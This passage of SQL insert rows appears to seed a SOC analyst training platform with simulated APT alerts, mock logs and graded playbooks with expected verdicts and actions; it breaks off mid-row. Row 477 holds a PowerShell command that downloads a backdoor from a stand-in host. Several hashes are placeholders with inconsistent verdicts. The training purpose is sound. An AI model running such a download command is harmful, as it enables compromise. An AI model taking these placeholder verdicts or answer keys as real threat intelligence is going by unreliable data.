(468, 'Persistence: Registry Modification Identified', 'high', 'Registry Logs', 'The attackers modify registry settings to maintain persistence, ensuring their presence even after system reboots.', 'Persistence Mechanism', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:07Z\",\"event_id\":4657,\"computer_name\":\"WIN-EXAMPLE\",\"user\":\"malicious_user\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"operation\":\"SetValue\",\"value_name\":\"SuspiciousProgram\",\"value_type\":\"REG_SZ\",\"value_data\":\"C:\\\\malicious\\\\malware.exe\",\"attacker_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.42\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Service\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample used by attackers.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User involved in unauthorized registry modifications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(469, 'Lateral Movement: SMB Traffic Anomaly', 'high', 'Network Traffic Analysis', 'The network traffic analysis has detected anomalous SMB traffic consistent with lateral movement activities. Using the \'Havex\' Remote Access Trojan (RAT), attackers are performing network reconnaissance to map the industrial control network. This involves the identification of other critical systems within the network by exploiting the SMB protocol.', 'Network Reconnaissance', 'T1021.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:23:55Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.75\",\"destination_port\":445,\"protocol\":\"SMB\",\"malware_name\":\"Havex\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"john.doe\",\"filename\":\"netmap.exe\",\"external_attacker_ip\":\"203.0.113.45\"}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Critical system identified within the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with the Havex RAT.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Public IP address related to known malicious activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"netmap.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file used for network reconnaissance.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(470, 'Exfiltration: Unusual Data Transfer Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The DLP system detected an unusual data transfer from an internal host within the industrial control network to an external IP address. This exfiltration attempt involved sensitive files related to ICS operations, indicating a successful completion of the attackers\' objective.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"internal_ip\":\"192.168.5.23\",\"external_ip\":\"85.234.167.90\",\"filename\":\"ICS_Project_Plan.pdf\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"j.doe\",\"transfer_protocol\":\"HTTPS\",\"data_volume\":\"150MB\",\"detection_method\":\"Content Inspection\",\"alert_id\":\"DLP-EXFIL-20231015-001\"}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within the ICS network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"85.234.167.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ICS_Project_Plan.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive ICS document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malware associated with this hash\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"internal\",\"details\":\"Active employee\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(471, 'Suspicious Wi-Fi Network Activity', 'high', 'Network traffic logs', 'DarkHotel initiated an operation by compromising a hotel\'s Wi-Fi network. The network traffic logs indicate suspicious activity from an external IP address, suggesting an attempt to gain initial access to target devices.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:15Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"src_port\":443,\"dst_port\":8080,\"protocol\":\"HTTPS\",\"username\":\"guest_user\",\"file\":{\"filename\":\"trojan_hotel.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},\"action\":\"connection_attempt\",\"result\":\"success\",\"log_id\":\"abcd1234\"}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"This IP is known to be associated with DarkHotel APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DarkHotel trojan.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"trojan_hotel.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Analysis Sandbox\",\"verdict\":\"malicious\",\"details\":\"Filename is commonly used in DarkHotel campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"guest_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Database\",\"verdict\":\"internal\",\"details\":\"Default username for hotel guests.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(472, 'Unsigned Software Update Detected', 'high', 'Endpoint security alerts', 'An advanced alert was triggered when a target device attempted to execute a software update lacking a valid signature. This indicates a potential execution of a malicious payload disguised as a legitimate software update.', 'Execution', 'T1204.002 - User Execution: Malicious File', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:27:49Z\",\"device_id\":\"WIN-192168011\",\"user\":\"jdoe\",\"filename\":\"update_v1.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_signature_status\":\"unsigned\",\"source_ip\":\"192.168.0.11\",\"destination_ip\":\"45.76.12.34\",\"process_id\":4528,\"execution_path\":\"C:\\\\Program Files\\\\Update\\\\update_v1.exe\",\"alert_message\":\"Unsigned software update executed on endpoint\",\"external_reputation\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 14/60 antivirus engines\"}}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.12.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Command and Control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 14/60 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"update_v1.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee active in the HR department.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(473, 'Tapaoux Malware Persistence Mechanism', 'high', 'File integrity monitoring', 'The Tapaoux malware employs advanced techniques to maintain persistence, ensuring continued access to the target device despite potential reboots or shutdowns.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:48:00Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"target_ip\":\"10.0.15.21\",\"user\":\"compromised_user\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\tapaoux.dll\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"Added to startup\",\"registry_key_modified\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\TapaouxService\"}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Tapaoux malware operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised device.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\tapaoux.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Tapaoux malware DLL used for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Tapaoux malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account suspected to be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(474, 'Unauthorized Credential Access Attempt', 'high', 'Authentication logs', 'DarkHotel APT group attempts to harvest credentials from a compromised device, aiming to move laterally and access additional systems within the network. The attack was detected through unusual login attempts from an external IP address using a compromised internal account.', 'Lateral Movement', 'T1078.001 - Valid Accounts: Default Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"4625\",\"logon_type\":\"3\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"status\":\"FAILED\",\"failure_reason\":\"Unknown user name or bad password\",\"target_machine\":\"WIN-DC01\",\"hash\":\"e4d909c290d0fb1ca068ffaddf22cbd0\",\"filename\":\"darkhotel_tool.exe\"}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with DarkHotel APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual access patterns detected.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e4d909c290d0fb1ca068ffaddf22cbd0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Known hash for DarkHotel credential harvesting tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL),
(475, 'Exfiltration of Sensitive Data', 'critical', 'Data loss prevention alerts', 'The final phase of the attack involves exfiltrating sensitive information from the executive\'s device to an external server controlled by DarkHotel, completing their malicious objectives.', 'Exfiltration', 'T1048.003 - Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45.123Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"8080\",\"protocol\":\"HTTP\",\"username\":\"jdoe_exec\",\"filename\":\"Executive_Report_Q3_2023.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_source\":\"DLP\",\"threat_actor\":\"DarkHotel\",\"external_server\":\"malicious-server.example.com\"}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the source device.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with DarkHotel APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Executive_Report_Q3_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document containing executive data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious files used by DarkHotel.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"malicious-server.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation\",\"verdict\":\"malicious\",\"details\":\"Domain known to be used by DarkHotel for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(476, 'Suspicious Email with Malicious RTF Attachment Detected', 'medium', 'Email Security Gateway', 'A spear-phishing email was detected targeting a regional government employee. The email contained a RoyalRoad RTF file, commonly used by Naikon APT to exploit vulnerabilities in Microsoft Word for initial access.', 'Phishing', 'T1566.001', 1, 'Closed', 1, '{\"timestamp\":\"2023-10-24T09:15:27Z\",\"email_id\":\"b7f9a85d-083f-4d6b-9c6f-f22a3fc1e9b1\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"employee@regionalgov.org\",\"subject\":\"Urgent: Review Attached Document\",\"attachment\":{\"filename\":\"important_document.rtf\",\"hash\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\"}', '2026-01-05 03:08:29', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feeds\",\"verdict\":\"malicious\",\"details\":\"IP associated with Naikon APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of recipient.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"employee@regionalgov.org\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate email of a regional government employee.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash associated with RoyalRoad exploit documents.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"important_document.rtf\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in spear-phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(477, 'Execution of Malicious Payload via RoyalRoad Exploit', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the RTF document, the RoyalRoad exploit triggers, executing a script that downloads the Aria-body backdoor onto the target\'s system.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'new', 34, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_id\":\"EDR-456789\",\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"10.0.0.25\",\"user\":\"jdoe\",\"file_name\":\"malicious_document.rtf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_executed\":\"powershell.exe -Command Invoke-WebRequest -Uri http://malicious-site.com/aria-body.exe -OutFile C:\\\\Temp\\\\aria-body.exe\",\"malware_hash\":\"4a8a08f09d37b73795649038408b5f33\",\"action_taken\":\"Quarantine\"}', '2026-01-05 03:08:29', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_document.rtf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"File involved in RoyalRoad exploit delivery.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to malicious RTF documents.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"4a8a08f09d37b73795649038408b5f33\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Aria-body malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(478, 'Aria-body Backdoor Establishes Persistence', 'medium', 'System Logs', 'The Aria-body backdoor has been detected establishing persistence by creating a scheduled task. This ensures the malware runs at system startup, maintaining access on the compromised machine.', 'Persistence Mechanism', 'T1053.005 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:07Z\",\"event_id\":4698,\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\Aria-body\",\"task_action\":\"Create\",\"task_author\":\"SYSTEM\",\"task_trigger\":\"At startup\",\"executed_by\":\"192.168.1.15\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"aria-body.exe\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\"}', '2026-01-05 03:08:29', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a variant of the Aria-body malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"aria-body.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"File associated with Aria-body backdoor malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised and used for unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(479, 'Lateral Movement Detected Across Internal Network', 'high', 'Network Traffic Analysis', 'Using stolen credentials, the attacker moves laterally within the network, targeting additional systems to widen their access and control. The attacker used RDP connections to access a critical server using the account j.doe.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"protocol\":\"RDP\",\"username\":\"j.doe\",\"event\":\"Successful login\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious.exe\"}', '2026-01-05 03:08:29', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal asset database\",\"verdict\":\"internal\",\"details\":\"Internal company server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal user database\",\"verdict\":\"suspicious\",\"details\":\"Account accessed from external IP\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"File associated with lateral movement activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL),
(480, 'Data Exfiltration to Command and Control Server', 'high', 'Firewall Logs', 'Sensitive data has been exfiltrated from the internal network to an external command and control server. The attacker used a domain that mimics a legitimate regional government site to avoid detection. This activity is consistent with Naikon APT operations focused on espionage.', 'Data Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:37:22Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.56\",\"src_port\":45678,\"dst_port\":443,\"protocol\":\"TCP\",\"action\":\"ALLOW\",\"hostname\":\"internal-host.local\",\"domain\":\"gov-info-update.com\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"filename\":\"confidential_report.pdf\",\"event_id\":\"FW-EXFIL-20231015-001\"}', '2026-01-05 03:08:29', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Naikon APT.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"gov-info-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_watch\",\"verdict\":\"suspicious\",\"details\":\"Domain mimics a legitimate government site, commonly used for phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malicious exfiltration tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive information and was involved in 